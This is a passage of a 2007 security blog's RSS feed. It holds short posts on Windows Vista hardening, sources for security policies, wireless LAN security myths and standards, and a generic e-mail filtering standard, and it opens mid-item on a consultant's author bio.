<p>Mr. Gale Yocom is a recognized technology expert and President of the Dallas-based security specialist company Covetrix. For the past ten years his company has provided full-service networking and security solutions to government entities, financial institutions, and commercial businesses across the U.S. Performing security audits, penetration testing and implementation of security controls, he brings a wealth of knowledge and information to Internet security. Mr. Yocom is known for effectively uncovering weaknesses in institutions&#8217; security practices and has impressively strengthened the security posture of many financial institutions. Mr. Yocom can be reached by contacting him at gale(at)covetrix.com or by visiting him on the web at <a href="http://www.covetrix.com">www.covetrix.com</a></p>
<p>Article Source: <a href="http://ezinearticles.com/?expert=Gale_Yocom" target="_new">http://EzineArticles.com/?expert=Gale_Yocom</a><br />
<a href="http://ezinearticles.com/?Sophisticated-Attacks-on-Community-Financial-Institutions-Increasing!&amp;id=909211" target="_new">http://EzineArticles.com/?Sophisticated-Attacks-on-Community-Financial-Institutions-Increasing!&amp;id=909211</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.datasecuritypolicies.com/sophisticated-attacks-on-community-financial-institutions-increasing/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Vista Hardening Guide</title>
		<link>http://www.datasecuritypolicies.com/vista-hardening-guide</link>
		<comments>http://www.datasecuritypolicies.com/vista-hardening-guide#comments</comments>
		<pubDate>Sat, 15 Dec 2007 19:46:10 +0000</pubDate>
		<dc:creator>Marc</dc:creator>
				<category><![CDATA[Windows Hardening Standard]]></category>
		<category><![CDATA[Security Standards]]></category>
		<category><![CDATA[Vista]]></category>
		<category><![CDATA[Vista Hardening Guide]]></category>
		<category><![CDATA[Vista Hardening Standard]]></category>

		<guid isPermaLink="false">http://www.datasecuritypolicies.com/vista-hardening-guide</guid>
		<description><![CDATA[If you&#8217;re planning on deploying Windows Vista, make sure you follow the Windows Vista Security Guide available from Microsoft Technet here. This is a description of the hardening guide: This guide focuses on how to help create and maintain a secure environment for desktop and laptop computers that run Windows Vista. The guide explains the [...]]]></description>
			<content:encoded><![CDATA[<p>If you&#8217;re planning on deploying Windows Vista, make sure you follow the Windows Vista Security Guide available from Microsoft Technet <a href="http://technet.microsoft.com/en-us/bb629420.aspx">here</a>.</p>
<p>This is a description of the hardening guide:</p>
<blockquote><p>This guide focuses on how to help create and maintain a secure environment for desktop and laptop computers that run Windows Vista. The guide explains the different stages of how to secure two different environments, and what each security setting addresses for the desktop and laptop computers deployed in either one. The guide provides prescriptive information and security recommendations.</p></blockquote>
<p>Here are the chapters:</p>
<blockquote><p>Chapter 1: Implementing the Security Baseline<br />
Chapter 2: Defend Against Malware<br />
Chapter 3: Protect Sensitive Data<br />
Chapter 4: Application Compatibility<br />
Chapter 5: Specialized Security – Limited Functionality<br />
Appendix A: Security Group Policy Settings</p></blockquote>
<p>Don&#8217;t install Vista without it!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datasecuritypolicies.com/vista-hardening-guide/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Security Policies Survey</title>
		<link>http://www.datasecuritypolicies.com/security-policies-survey</link>
		<comments>http://www.datasecuritypolicies.com/security-policies-survey#comments</comments>
		<pubDate>Sun, 11 Nov 2007 21:32:26 +0000</pubDate>
		<dc:creator>Marc</dc:creator>
				<category><![CDATA[Security Policies]]></category>
		<category><![CDATA[Security Standards]]></category>

		<guid isPermaLink="false">http://www.datasecuritypolicies.com/security-policies-survey</guid>
		<description><![CDATA[This blog entry from the Security Monkey at ITToolbox.com is shaping up to be a very handy list of security policy websites. Entitled, &#8220;Where Do You Get Your Security Policies From?&#8221;, the Security Monkey asks readers to respond with websites that they use for researching security policies. Included in the suggestions are: http://www.sans.org/resources/policies/ http://csrc.nist.gov/publications/nistpubs/index.html CoBIT [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blogs.ittoolbox.com/security/investigator/archives/where-do-you-get-your-security-policies-from-15764">This blog entry</a> from the Security Monkey at ITToolbox.com is shaping up to be a very handy list of security policy websites. Entitled, &#8220;Where Do You Get Your Security Policies From?&#8221;, the Security Monkey asks readers to respond with websites that they use for researching security policies.</p>
<p>Included in the suggestions are:</p>
<ul>
<li><a href="http://www.sans.org/resources/policies/">http://www.sans.org/resources/policies/</a></li>
<li><a href="http://csrc.nist.gov/publications/nistpubs/index.html">http://csrc.nist.gov/publications/nistpubs/index.html</a></li>
<li>CoBIT (<a href="http://www.isaca.org/cobit">http://www.isaca.org/cobit</a>)</li>
<li>ISF Security Standard (<a href="http://www.isfsecuritystandard.com/">http://www.isfsecuritystandard.com</a>)</li>
<li>ISO27XXX series (<a href="http://www.iso.ch/">http://www.iso.ch</a>)</li>
<li>IT Baseline Protection Manual (<a href="http://www.bsi.de/english/gshb/index.htm">http://www.bsi.de/english/gshb/index.htm</a>)</li>
<li>Plus many more</li>
</ul>
<p>Definitely worth checking out!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datasecuritypolicies.com/security-policies-survey/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Before You Write Your Wireless Security Standards, Wireless LAN Security Myths You Need to Know</title>
		<link>http://www.datasecuritypolicies.com/before-you-write-your-wireless-security-standards-wireless-lan-security-myths-you-need-to-know</link>
		<comments>http://www.datasecuritypolicies.com/before-you-write-your-wireless-security-standards-wireless-lan-security-myths-you-need-to-know#comments</comments>
		<pubDate>Thu, 08 Nov 2007 21:15:42 +0000</pubDate>
		<dc:creator>Marc</dc:creator>
				<category><![CDATA[Security Standards]]></category>
		<category><![CDATA[Wireless Security Standard]]></category>
		<category><![CDATA[Security Policies]]></category>

		<guid isPermaLink="false">http://www.datasecuritypolicies.com/before-you-write-your-wireless-security-standards-wireless-lan-security-myths-you-need-to-know</guid>
		<description><![CDATA[When you write your wireless security standards, make sure you don&#8217;t fall into the trap of including wireless LAN security myths in them. George Ou has written extensively about wireless LAN security and he&#8217;s published several articles on common wireless LAN security myths in ZDNet over the years. His latest article, &#8220;Wireless LAN security myths [...]]]></description>
			<content:encoded><![CDATA[<p>When you write your wireless security standards, make sure you don&#8217;t fall into the trap of including wireless LAN security myths in them.</p>
<p>George Ou has written extensively about wireless LAN security and he&#8217;s published several articles on common wireless LAN security myths in ZDNet over the years. His latest article, &#8220;Wireless LAN security myths that won’t die&#8221; can be found on his ZDNet blog <a target="_blank" href="http://blogs.zdnet.com/Ou/?p=454">here</a>.</p>
<p>He categorizes the myths he debunks as follows:</p>
<blockquote><p><strong>Waste of money, resources, time</strong></p>
<ul>
<li>MAC filtering</li>
<li>Disable DHCP and use Static IP addresses</li>
<li>Signal suppression with expensive paint or antenna placement</li>
</ul>
<p><strong>Worse than no wireless security at all</strong></p>
<ul>
<li>LEAP (adding EAP-FAST to the list)</li>
<li>SSID Access Point beacon suppression (or &#8220;hiding&#8221;)</li>
</ul>
<p><strong>Has nothing to do with security mechanisms</strong></p>
<ul>
<li>Just use 802.11a or Bluetooth</li>
</ul>
</blockquote>
<p>Even if you&#8217;re not writing your wireless security standard, read George&#8217;s article and make sure you aren&#8217;t spreading myths and making yourself look dumb in front of others who know better! :)</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datasecuritypolicies.com/before-you-write-your-wireless-security-standards-wireless-lan-security-myths-you-need-to-know/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wireless Security Standards</title>
		<link>http://www.datasecuritypolicies.com/wireless-security-standards</link>
		<comments>http://www.datasecuritypolicies.com/wireless-security-standards#comments</comments>
		<pubDate>Tue, 06 Nov 2007 21:01:48 +0000</pubDate>
		<dc:creator>Marc</dc:creator>
				<category><![CDATA[Security Standards]]></category>
		<category><![CDATA[Wireless Security Standard]]></category>
		<category><![CDATA[Security Policies]]></category>
		<category><![CDATA[Security Policy]]></category>

		<guid isPermaLink="false">http://www.datasecuritypolicies.com/wireless-security-standards</guid>
		<description><![CDATA[The University of Connecticut has a great wireless security standards worksheet here. It includes requirements for large deployments and small/individual deployments as well as requirements that are common for all deployments. Here&#8217;s an excerpt: Common Requirements Please review the University Wireless Policy for policy related information. Minimum Technical Requirements Locate APs on the interior of [...]]]></description>
			<content:encoded><![CDATA[<p>The University of Connecticut has a great wireless security standards worksheet <a target="_blank" href="http://vm.uconn.edu/~itpolicy/wireless/wireless.pdf">here</a>.</p>
<p>It includes requirements for large deployments and small/individual deployments as well as requirements that are common for all deployments.</p>
<p>Here&#8217;s an excerpt:</p>
<blockquote><p><strong><u>Common Requirements</u></strong></p>
<p>Please review the University Wireless Policy for policy related information.</p>
<p><strong>Minimum Technical Requirements</strong></p>
<ul>
<li>Locate APs on the interior of buildings instead of near exterior walls and windows as appropriate.</li>
<li>Place APs in secured areas to prevent unauthorized physical access and user manipulation.</li>
<li>Change the default Service Set Identifier (SSID).</li>
<li>Ensure that AP channel selection utilizes the maximum number of non-overlapping channels for the given spectrum.</li>
<li>Use WPA or greater encryption.</li>
<li>APs shall not be plugged into network hubs.</li>
<li>Ensure that all APs have strong administrative passwords.</li>
<li>Use SNMPv3 and/or SSL/TLS for Web-based management of APs.</li>
<li>Access points cannot interfere with any part of the central University wireless network.</li>
<li>When disposing of access points that will no longer be used, clear access point configuration to prevent disclosure of network configuration, keys, passwords, etc.</li>
</ul>
</blockquote>
<p>Here&#8217;s an archived copy of the standard: <a href="http://www.datasecuritypolicies.com/wp-content/uploads/2007/04/wireless-security-standards.pdf" title="Wireless Security Standards">Wireless Security Standards</a></p>
<p>Great info! Check it out!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datasecuritypolicies.com/wireless-security-standards/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Generic E-mail Filtering Standard</title>
		<link>http://www.datasecuritypolicies.com/generic-e-mail-filtering-standard</link>
		<comments>http://www.datasecuritypolicies.com/generic-e-mail-filtering-standard#comments</comments>
		<pubDate>Fri, 02 Nov 2007 19:19:50 +0000</pubDate>
		<dc:creator>Marc</dc:creator>
				<category><![CDATA[E-mail Filtering Standard]]></category>
		<category><![CDATA[Security Standards]]></category>

		<guid isPermaLink="false">http://www.datasecuritypolicies.com/generic-e-mail-filtering-standard</guid>
		<description><![CDATA[I wrote a generic e-mail filtering standard. Here&#8217;s an excerpt: 3.1 Content Filtering Employ a content filtering mechanism that scans all incoming e-mail messages and their attachments and manages the messages depending on the results of the scan. 3.1.1 Suspicious Content Strip suspicious active content (ActiveX, JavaScript, etc.) from e-mail and forward to quarantine. 3.1.2 [...]]]></description>
			<content:encoded><![CDATA[<p>I wrote a generic e-mail filtering standard.</p>
<p>Here&#8217;s an excerpt:</p>
<blockquote><p><strong>3.1 Content Filtering</strong></p>
<p>Employ a content filtering mechanism that scans all incoming e-mail messages and their attachments and manages the messages depending on the results of the scan.</p>
<p><strong>3.1.1 Suspicious Content</strong></p>
<p>Strip suspicious active content (ActiveX, JavaScript, etc.) from e-mail and forward to quarantine.</p>
<p><strong>3.1.2 Prohibited Words</strong></p>
<p>Quarantine e-mails that contain words or phrases that indicate the e-mail is “junk” or “spam”, words in the “Carlin List” and words that are racist, libelous, offensive or obscene.</p>
<p><strong>3.1.3 Outbound Filtering</strong></p>
<p>Protect the organization from possible litigation or loss of sensitive data by implementing outbound e-mail filtering.</p>
<p>3.1.3.1 Quarantine outbound e-mails that contain words or phrases viewed as inappropriate for use in organizational e-mail, including hoaxes and “spam”.<br />
3.1.3.2 Quarantine outbound e-mails that contain words or phrases that indicate sensitive data is leaving the organization.</p>
</blockquote>
<p>An archive of the standard is here: <a href="http://www.datasecuritypolicies.com/wp-content/uploads/2007/04/generic-e-mail-filtering-standard.pdf" title="E-mail Filtering Standard">E-mail Filtering Standard</a></p>
<p>Let me know if you have any suggestions!</p>
]]></content:encoded>
			<wfw:commentRss>http://www.datasecuritypolicies.com/generic-e-mail-filtering-standard/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
